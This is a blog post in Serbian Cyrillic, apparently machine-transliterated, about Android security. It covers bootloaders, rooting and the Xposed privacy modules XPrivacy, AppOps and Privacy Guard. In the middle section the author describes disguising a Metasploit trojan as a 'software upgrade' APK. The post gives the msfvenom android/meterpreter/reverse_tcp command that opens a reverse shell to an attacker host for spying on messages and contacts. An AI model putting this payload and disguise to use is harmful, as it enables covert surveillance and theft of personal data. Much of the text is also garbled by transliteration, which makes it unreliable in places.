Извор слике: пикабаи.цом

Увод у Андроид

У овој теми сазнаћемо о Андроиду и безбедности са отвореним кодом (ОС). Андроид је платформа отвореног кода. Много је сличан Линуку, али ипак се превише разликује од Линука. Линук је превише сазрео у поређењу са Андроидом. Дакле, ово је Цхетан Наиак, и добродошли на мој следећи блог о Опен Соурце Веб Сецурити-у. Написао сам овај блог претпостављајући да би већина нас користила Андроид К, тј. Киткат или Андроид Л, односно Лоллипоп.

Разлог што су медењаци и медузе имали пуно проблема са безбедношћу отвореног кода о којима не могу да расправљам у овом блогу. Дакле, можда ћу о томе разговарати следећи пут када се детаљније позабавим старијим верзијама Андроида. Дакле, од сада, држимо се КитКат-а и Лоллипопа.

Андроид је дизајниран с обзиром на програмере. Сигурносне контроле дизајниране су тако да смање оптерећење за програмере. Програмери који раде на безбедности могу лако да раде и ослањају се на флексибилне безбедносне контроле. Програмери који мање познају сигурност биће заштићени сигурним подразумеваним поставкама.

Почетак

Нисам био пуно за андроид све до каснијег тромесечја 2013. године када сам имао свој први Андроид мобилни телефон који је био Сони Кспериа Л (заснован на 4.2.2 од тада). Додјавола, чак сам и мрзео андроид разлог што је био изузетно заостајан, посебно Самсунг уређаји. Тада сам чак размишљао о куповини Виндовс Лумиа, али срећом, играо сам пуно игара и морао сам да купим Кспериа Л, јер је ова ћелија била Лаг Прооф. Имао је око 1 гиг РАМ-а и Адрено 305. Довољно цоол да било шта покрене.

После играња пуно игара као што су НОВА3 и МодернЦомбат4, досадио сам ми у тој ћелији у року од месец дана. Знао сам да се Андроид заснива на Линуку и хтео сам да извршим неке своје модификације на томе. Почео сам читати о прилагодбама и научио о ономе што се назива "Укоријењивање". Пошто сам имао добар бацкханд у Линуку, укорењевање није било проблем за мене. Уз мало помоћи КСДА, успео сам успешно да изгорим своју ћелију.

Али тада ме је нешто погодило. Чим се моја ћелија поново покренула након укорјењивања, тек је почело покретање система за подизање (заувијек заглављено на екрану за покретање). Нисам ни знао који је боотлоадер у андроиду. Дакле, нисам могао ништа учинити. Било ми је само месец дана када сам купио нову ћелију и моја ћелија је сада била мекана циглана. Увек сам читао како је укорјењивање опасно, али нисам знао да ће то опећи моју ћелију. Али, погрешио сам. Док сам непрестано читао једне и друге ствари о укорјењивању, сазнао сам да укоријењивање не опече ваш телефон.

Корјењење је слично слично и Админ Аццессу у рачунару (уствари је системски приступ, али написао сам Админ Аццесс, тако да је за нообове лако разумети.). То значи да укорењевање никада неће затрпати ваш телефон. То је уређај за подизање система подигао мој телефон. За људе који не знају боотлоадер је; боотлоадер је сличан БИОС-у у Виндовсима. (Ако не знате шта је БИОС, тада уопште не треба ни да читате како размишљате о безбедности.) Боотлоадер или Хбоот (тако се зове Андроид) прва је ствар која се покреће приликом покретања система Андроид уређај.

Она пакује упутства за покретање језгре оперативног система и већина њих је посебно дизајнирана за покретање сопственог окружења за уклањање погрешака или модификације.

Безбедносна провера система Андроид

Замислите програм за покретање система као сигурносну контролну тачку свог уређаја. Ако прекршите ову контролну тачку, изгубит ћете све што имате на телефону. Дакле, кажем да је то добра безбедносна функција. Јер ако изгубите телефон, а неко покуша добити роот приступ да би заобишао браву (под претпоставком да сте закључали свој уређај с ПИН-ом или лозинком.), Обавезно ће морати откључати уређај за покретање система, што ће резултирати брисањем ваших података на телефон.

Дакле, не морате се бринути да ли ће неко то злоупотребити. Дакле, сличан је случај и са прилагођеним РОМ-овима. РОМ-ови су оперативни системи засновани на Андроид верзијама посебно дизајнираним за вашу хардверску архитектуру. Дакле, ако проверите за КСДА, за свој телефон, имат ћете н броја прилагођених РОМ-а за ваше телефоне, од којих су неки најпознатији Цианоген Мод РОМ-ови, који су већ унапред укорењени и долазе са унапред дефинисаним сетом прилагодби. .

Безбедносно превазилажење Андроида

Од сад можда размишљате да имате сигуран мобител. Али ту сам да вам поново докажем да нисте у праву и у томе је суштина овог блога. До другог тромесечја 2014. године, људи су већ почели да развијају експлоатације и роотките за Андроид, који би могли да искористе ваше мобилне телефоне, чак и да не откључате програме за покретање система.

Није довољно страшно? Дозволите да вам кажем најопаснији део. Чак су могли инсталирати Тројанце унутар тога. Дакле, чак и ако би полицајци могли да пронађу ћелију, а чак је и вратите, још увек постоји велики ризик да би могли видети све што радите на свом телефону. То сам покушао као експеримент у стварном практичном окружењу.

За овај напад користио сам Метасплоит. Оно што сам урадио је да сам створио тројански програм и инсталирао га у циљни телефон. Била је то једноставна апк датотека, и назвао сам је софтверском надоградњом. Дакле, ако је корисник само обичан човек који има само битне и бајтне податке о безбедности, онда се неће ни усудити да га уклони. Побринуо сам се да се сваки пут када се активира интернет, малваре који сам створио аутоматски извршава и повеже натраг на мој удаљени порт на рачунару домаћина.

За напад су кориштене сљедеће команде (Метасплоит је софтвер за тестирање продора који помаже у провјери рањивости на платформи или одређеним уређајима.)

ИП адреса мог домаћина: 192.168.кк.кк

Мој порт хоста (за повезивање натраг): 445

>>>msfvenom

>>> мсфвеном андроид / метерпретер / реверсе_тцп ЛХОСТ = 192.168.кк.кк ЛПОРТ = 445> СофтвареУпграде.апк

Дакле, овде сам створио обрнути ТЦП канал на свом рачунару. Дакле, сваки пут када интернет покрене на андроиду, отворићу се шкољка на мојој Кали машини или на машини на коју сам инсталирао Метасплоит.

Дакле, сада знате колико је застрашујуће за особу коју чак ни не знате, има евиденцију о свакој трансакцији коју обављате путем своје ћелије, сваки други контакт, ВхатсАпп поруке, СМС, Вибер и Скипе дневник позива и све остало. Ако то није застрашујуће, онда не знам шта је то.

Препоручени курсеви

  • Течај сертификације у Руби Дебуггингу
  • Комплетан ПХП МиСКЛ курс
  • Онлине течај за сертификацију у ВБ.НЕТ програмирању
  • Интернет курс фондације ИТИЛ

Тхе Цовераге

Доста о сигурносним питањима. Сви знамо да свака друга платформа има проблеме са сигурношћу. Како смо онда могли бити сигурни? То није сасвим тачно. Платформе могу бити сигурне до одређене тачке, али након тога, на нама је да се побринемо да остане тако. У свету безбедности постоји злогласни цитат:

„Социјални инжењеринг: Зато што нема закрпе за људску глупост“

Ову сам фразу чуо давно док сам гледао конференцију ДефЦон-а.

Када не постоји техничка рањивост коју треба искористити, покушајте хаковати људе. А, под тим, не мислим на хипнотизам и сличне ствари. Мислим на социјални инжењеринг. Можете прочитати мој други блог „Важност цибер сигурности у нашем свакодневном животу“ за више информација о томе.

Главна безбедносна функција Андроида

Поред тога, социјални инжењеринг, за шта се можете побринути само ако сте паметни; постоје начини како можете развијати андроид апликације на сигуран начин да бисте били сигурни да ће тако и остати.

Ево неких основних безбедносних функција које вам помажу у стварању сигурних апликација:

  • Сандбок апликација за Андроид, која изолира податке ваше апликације и извршавање кода од других апликација.
  • Апликативни оквир са робусним имплементацијама заједничких безбедносних функција као што су криптографија, дозволе и сигуран ИПЦ.
  • Шифрирани датотечни систем који се може омогућити да заштити податке на изгубљеним или украденим уређајима.
  • Корисничке дозволе за ограничавање приступа функцијама система и корисничким подацима.
  • Дозволе дефиниране апликацијом за контролу података апликација на основи апликације.

Шта можете учинити ако желите безбедно окружење, а нисте програмер?

Као и за Андроид 5, тј. Лоллипоп, пружа функцију где корисник може да дода више профила и ограничен мод за употребу телефона и таблета. Осим тога, ако сте уградили свој телефон, постоје андроид апликације у Кспосед модулима као што су АппОпс, Ксприваци или Приваци Гуард који вам могу помоћи да се бринете о готово свему. За то морате инсталирати Кспосед Фрамеворк.

Кспосед Фрамеворк је оно што омогућава да Кспосед модули раде. Изложени модули омогућавају вам да промените понашање Апк датотека и системских датотека без потребе за инсталирањем другог РОМ-а. Измене су такође једноставне за поништавање, тако да је овде мало ризика и то чак није пуно времена јер нема потребе за флешем више РОМ-а, кернела и њихових исправки грешака.

Ксприваци, Приваци Гуард и АппОпс су изложени модули који вам омогућавају да заштитите свој Андроид одабиром која апликација треба да има приступ ономе што су Интернет, тастатура, сдцард, роот приступ и пуно других ствари. Можете чак да онемогућите приступ само одређеним сервисима и створите корисничке предлошке за то. Што се мене тиче, радије бирам Ксприваци. Но, ево неких информација или разлика уколико се желите разликовати да изаберете између горе наведене три.

АппОпс:

Оригинално је то увео Гоогле у Андроид 4.3. (То је главни разлог што га не подржавам. Не верујем Гооглеу. Назовите га Параноиа, али Гоогле прати све што радите. И не треба ми неко да прати све што радим, али ако верујете Гооглеу, само напред.). Главно ограничење АппОпс-а је да Гоогле дозвољава само да блокирате приступ оним апликацијама које желите да блокирате.

То значи ако желите да блокирате апликације повезане са Гоогле-ом, као што су Плаи Сервицес (које заправо троше више од 50% ваше нормалне меморије, батерије и података (интернет)) нећете моћи. То је још један разлог за то да мрзим Гоогле. Дакле, верујем да АппОпс за мене није ништа друго него злонамерни софтвер. (али то само ја тако мислим, није ако само срцем верујете Гооглеу)

Приваци Гуард:

Приваци Гуард је једноставан за употребу сучеље које је Цианоген Мод заменио за АппОпс. Ако сте почетник, онда вам предлажем да је користите јер има само дугме за укључивање и искључивање и сопствене дефинисане шаблоне која врста апликација треба да има приступ томе. То није тако сигурно ако постоји злонамерни софтвер који делује или се лажно представља као системска апликација. Али добро је започети.

Ксприваци:

Ксприваци је алат Алл ин оне. Али намењен је стручњацима. Можете га упоредити са ножем швајцарске војске. Има све у себи и може ваш телефон осигурати на сваки други начин, али ако не знате шта радите, то ће само упрљати телефон и зауставити апликације чак и од самог стартовања. Такође можете да ограничите приступ системским апликацијама. Ово је оно што ја лично радије бирам.

Поред горе наведених модула, постоје чак и други модули као што су Лигхтенинг Фиревалл или БоотМанагер у Кспоседу, који могу помоћи да се ограниче приступ Интернету за одређене апликације и зауставе апликације да се покрећу поред система приликом поновног покретања телефона.

Па, то би било то за овај блог. У случају недоумица у вези са сигурношћу, сигурно можете посетити или бити члан КСДА веб локације која вам може дати много више информација о приватности.

Препоручени чланци: -

Ово је водич за Андроид. Овде смо разговарали о основном концепту, безбедносним контролним тачкама и основној безбедносној функцији Андроида. Можете и да прођете кроз друге наше предложене чланке да бисте сазнали више -

  1. Питања о Андроид интервјуу - Топ 10 корисних питања
  2. 8 корисних алтернатива Сири за Андроид
  3. 28 најбољих савета и трикова за алате за развој Андроид апликација
  4. Каријере у Андроид развоју

Категорија:

Развој софтвера